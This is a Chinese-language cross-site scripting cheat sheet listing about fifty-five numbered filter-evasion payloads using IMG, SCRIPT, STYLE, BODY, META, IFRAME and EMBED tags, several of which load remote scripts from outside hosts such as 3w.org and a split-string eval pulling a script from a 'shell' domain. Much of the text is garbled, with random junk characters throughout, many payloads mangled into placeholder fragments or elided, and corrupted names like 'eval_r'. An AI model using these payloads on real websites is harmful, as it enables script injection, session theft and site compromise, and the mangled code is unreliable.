(1)普通的XSS JavaScript注入
3 n: ~- |( ~/ ~9 w2 J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) ? c% X6 y, M/ [& s/ `0 i% Y4 D
(99)另类弹框
8 z& e4 q4 `9 V, }<q/oncut=alert()>1$ I b5 M2 H8 E1 _# ^1 o
<s/onclick=alert()>b- f2 W! @( Y0 N6 {4 a& O+ ~
<XSS=" onclick="alert(1)//">clickme</SSX=">4 |* C9 e4 K; m8 V/ D# H+ ~
<zzz onclick=alert`1`>clickme</zzz> , L) e) x9 \1 l% W$ v1 s
<a onclick=alert`1`>clickme</a>& p! r: ^( S. l* Z2 W. P
<a=">clickme</a="># Y- d+ S3 R4 Z- G' q* U6 b
<a=">clickme</a>
! g) Z% U: G; G0 f<z=">clickme</z=">7 l- \# G% ~6 a# v: b6 z9 x- W) [
<z onclick=alert`1`>clickme</z>6 `1 C9 z# ^0 P' _
; i6 Y. K, |! N6 L- t(2)IMG标签XSS使用JavaScript命令
. w2 o$ I. g. `( i1 Y<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& w+ M, ]: h! S) B- r
7 J# a* K1 X' x1 M7 Q* ^(3)IMG标签无分号无引号* z- \0 {4 s3 i. r3 t
<IMG SRC=javascript:alert(‘XSS’)># X% }/ O# g; W/ k- L
% o! {( g+ R, M5 Y1 C ~' Y(4)IMG标签大小写不敏感
+ G; Y! r6 k1 e9 _9 w [8 V% \" m<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 y4 p2 m5 M$ k8 x- e! P( S
- f7 ~. W+ P: I- M(5)HTML编码(必须有分号)% b0 v- `! x K! h* H- A( w) q8 p
<IMG SRC=javascript:alert(“XSS”)>! e6 L; i2 @8 C, [
0 \) A! n9 F4 ]2 w
(6)修正缺陷IMG标签
5 H! i; P6 ^% V<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: d" i$ p# U9 f. x
5 I% P' F7 x; f
(7)formCharCode标签(计算器)
: b! u3 d3 z6 d' u<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ O3 D i% [" d5 n$ p) Q7 s
0 P+ t% y d3 v! K(8)UTF-8的Unicode编码(计算器)
; G; }# O2 V: D# c) C# Z8 p- |<IMG SRC=jav..省略..S')>
) q& |6 p2 E/ B7 u; R
) O3 j8 J8 {" w1 `+ b(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 i5 {/ i; n. |" w0 D8 J# r<IMG SRC=jav..省略..S')>
" R& ?2 J& Q( v) B8 ]9 |0 O# K4 H- C9 F, [" i% k9 E
(10)十六进制编码也是没有分号(计算器)1 w( ]2 D/ [3 }" h( @: M# K0 ]
<IMG SRC=\'#\'" /span>
4 R9 U3 h" O1 a4 s# ~. W# ?; _. S; K
(11)嵌入式标签,将Javascript分开0 k. R ^% a% h# h& z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 d2 ]- q9 A ^) \4 V5 }
$ @: M, R, c7 q$ J" ^
(12)嵌入式编码标签,将Javascript分开
$ t2 t% N3 g* k: z6 X2 t, K* b% t<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 O( b) _) m n% s! F
) x1 |8 c0 A0 {(13)嵌入式换行符
$ \2 @! K7 v" E/ A, N3 | g<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 o' l6 @' d" F9 T4 B7 u& {+ x' [0 C' j w U
(14)嵌入式回车
+ A) w1 ^7 y4 M. O<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 q4 F$ f$ }# U) t
) }+ {! S: |0 s9 v: j4 n- v(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 I; [ `* K# ~- [
<IMG SRC=\'#\'" /span>+ N, P( ~, [' J1 m, Y4 i+ a
0 y. [4 d! \7 B# _- y
(16)解决限制字符(要求同页面)
: T: J) U8 [5 {, M<script>z=’document.’</script>9 s8 p U) R& `5 q
<script>z=z+’write(“‘</script>
" X1 \. l; q1 |+ y<script>z=z+’<script’</script>' H% }+ h' t3 @6 S8 y+ i
<script>z=z+’ src=ht’</script>
) }1 j R# w2 Q: y0 z& D& Z<script>z=z+’tp://ww’</script>5 _ G% M+ e% r
<script>z=z+’w.shell’</script>
: I, b2 {) C* Y( ^3 Y<script>z=z+’.net/1.’</script>1 V9 ~( w1 f- {$ S3 @9 J; o( {* ?
<script>z=z+’js></sc’</script>
( z/ b4 q7 L! w4 ]1 u<script>z=z+’ript>”)’</script>$ C: m# ]% g6 r1 \/ {, J8 ^% m
<script>eval_r(z)</script>
9 z7 m( ?4 o j( {% `& U) @7 [4 L7 j; {( {2 h
(17)空字符
" [ k& @6 x4 Q; Z6 a: nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 k3 I I, T3 m/ R) H# i) w
% |- }/ l: R: p! C2 @/ K |# h5 p
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ p v# n$ E+ t" eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 q7 `% W; M5 ^; f% B a+ T& z' ~/ c3 f) T8 @0 G
(19)Spaces和meta前的IMG标签
, V1 @& \1 H% B' ~. e* C/ g<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>$ C2 N5 c! j. b+ l0 X
' @& ?- u2 P) c+ p, t(20)Non-alpha-non-digit XSS- I1 R& d/ l; z6 R
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
9 _& W, W! Q4 O2 g4 g% m# p
5 l1 u" Q! P5 t+ l(21)Non-alpha-non-digit XSS to 2
: b, @; G a6 m8 n H$ E<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 m: Z% R2 G! C' f# {, f( \" v0 S3 |6 i3 B. o7 n) O% e0 I
(22)Non-alpha-non-digit XSS to 3, ~" E! z) I0 v1 r/ ?6 M' I& r2 e
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
" h! b. G) z) d" \5 I# s1 O$ p' |# o0 ~7 ]/ V: [
(23)双开括号4 d9 F- n4 j) h" p3 O
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
& l5 V; G" J* o$ p7 S: S/ H% }' A
(24)无结束脚本标记(仅火狐等浏览器)
N1 ^1 O7 C) f2 Q2 x: y, w<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& m' ?8 |8 q6 I# a! B( x6 y9 x3 K
(25)无结束脚本标记23 _* d0 ^" X; d7 ?
<SCRIPT SRC=//3w.org/XSS/xss.js>0 Q9 s' X% ~+ ^
7 ~- h& m; v8 }, F. [; m, z1 A# W(26)半开的HTML/JavaScript XSS
* `- _ o0 _$ Y! d8 C8 @8 T* g<IMG SRC=\'#\'" /span>
; q, s% l# i7 ~# B2 |0 Q) v$ ]2 L
+ {9 r! t. w" N) i% D( Y(27)双开角括号% g. f$ |9 p& c% p1 G, |$ x
<iframe src=http://3w.org/XSS.html <
/ m: y( a# v. P H8 w# H( S
/ b7 n3 d; O% p- Y( }. X(28)无单引号 双引号 分号# M3 w9 R2 z2 d
<SCRIPT>a=/XSS/
1 e) ^: g( @. |alert(a.source)</SCRIPT>2 ~# A0 Y0 @, I4 k- G
. ?- C. x: A) {: B; N" ]% s(29)换码过滤的JavaScript
6 y! J1 `3 J0 V9 m" \& k\”;alert(‘XSS’);//# C: i8 w+ Q# F6 h) y7 g2 z
$ Q! ?6 ^. f) a. f0 H
(30)结束Title标签! u) N4 Y& E6 j1 ?. H1 g. o; ^5 Z& K/ G
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 R! c2 O4 C9 l$ N
0 v" u" F" _2 X. ?4 g7 ^5 t(31)Input Image
# i6 a/ M8 ~# X<INPUT SRC=\'#\'" /span>
; d, u/ d7 W: _1 \* q! D$ W0 V0 Q! o: Y
(32)BODY Image
) w, y7 C# C6 F# o# p5 ]<BODY BACKGROUND=”javascript:alert(‘XSS’)”>& k* Z) c8 U& o; a4 P
7 U* i/ K/ A' @8 Y" @4 n8 v) W(33)BODY标签
! t& ]/ W( W& G$ D+ O& X- x) u% S<BODY(‘XSS’)>. n* g3 S- \# m* x6 F6 t7 J
+ g E* @+ Y2 W: ](34)IMG Dynsrc& N2 l: L" A' w/ c+ x2 N2 s
<IMG DYNSRC=\'#\'" /span>4 e' ^2 x3 ^7 P, \: Z7 \ [: Q
. E4 R1 b8 i: x+ \# y( w% t
(35)IMG Lowsrc
1 F, c! c& L/ c* H, G1 f6 Q0 _4 Q<IMG LOWSRC=\'#\'" /span>! x0 `" j6 H$ W4 x7 W. G" T
- Y/ e4 p% d$ ^
(36)BGSOUND0 ?; j% j' ~0 f6 a3 g; r* u
<BGSOUND SRC=\'#\'" /span>/ v' K. Q; G( w8 }
2 @$ O3 N! @2 Y# u* \* ~
(37)STYLE sheet
" c2 X" A1 ^ p/ F5 h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ y. v5 Z( z( d. w3 A2 d; C: h, g3 l t% f3 N$ `3 c# b
(38)远程样式表0 q+ J. I3 N1 J( O/ p5 H
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 j; t4 }: p" i6 x6 Q3 J9 M
* ]; i; f+ H7 d" A! J" l& q$ u
(39)List-style-image(列表式)
) Y3 W4 B2 P" L' K: ^" h, \<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS* @* c1 L. A( r/ l1 B
6 a* s, K& o) c0 s/ t
(40)IMG VBscript$ N% @3 h, Y$ Z) D* {! i+ ^4 I
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS: e7 z2 F( z* k5 n# E" w; e# f1 f0 j' L
; e8 ^# S: c- w) g) a(41)META链接url
: t" K/ a+ \( y<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( F7 Y, G' h9 b
! w9 ^# W9 j# n$ L+ D+ ~(42)Iframe8 R$ g1 w9 N- J1 m8 x. j( ?
<IFRAME SRC=\'#\'" /IFRAME>+ L% Y6 h; Y( R
0 u. h* [; Y P
(43)Frame, f J3 @" U" J# ]8 f7 w
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
/ G( ^* {6 [: @7 ^6 W) O. t% _3 C/ P( R) m( q
(44)Table
; q) j& Q* ]. z<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 G" N( K! `" L
# y& d7 N* j3 {
(45)TD
( k, G2 U3 R- X4 t4 t<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 B8 u7 V- K- X" A# x7 O* i" l' u7 v5 S9 V
(46)DIV background-image. S0 q! X* A5 b0 e5 U5 i
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! [. z% I/ \6 s6 B" |
+ r8 \: r0 i* e6 k, u(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)6 g6 z; b4 g0 h: L8 q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ C6 m4 S) W9 Y* y* k. C8 |# o* K) A9 ]- U
(48)DIV expression' [! |( Z3 H% M
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 W* `% S: ^3 N; U4 I4 e
' d+ a& b; b' z, ?# A(49)STYLE属性分拆表达/ z( B- v- H' c: |% q) J% X \9 B
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% [5 D/ [, b( S6 o
5 m$ Y% F& ~8 g; Z(50)匿名STYLE(组成:开角号和一个字母开头)4 a; P) u% _# m; k
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 w& Z) R; A; n
' s0 Z0 @/ F* `$ P" [
(51)STYLE background-image
' v+ b; I: c( f! {; H<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>- X( I* e' L! p) I1 b6 V6 M
& l. _2 g& @) z% b; c6 O$ p1 |' V
(52)IMG STYLE方式( g4 g3 z- }- p& @2 s" ~% J& z, w
exppression(alert(“XSS”))’>+ a8 u/ f& f6 P* `2 t/ A
! C" m" r5 ]( U5 f( Z. y(53)STYLE background* o1 l* ?. H( N" [% L
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( m( E* r) o4 a: J
# q' c' h b! O7 u(54)BASE
, | T0 H" |! }- o: G( O7 y+ a# J2 y/ w<BASE HREF=”javascript:alert(‘XSS’);//”>
2 e' N( ]( V# i: {6 G s2 C
4 Y. M0 q5 G2 }1 l8 ~# t(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS4 H1 p' V+ w; t# q
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>! V0 x- v2 u/ \; ~
|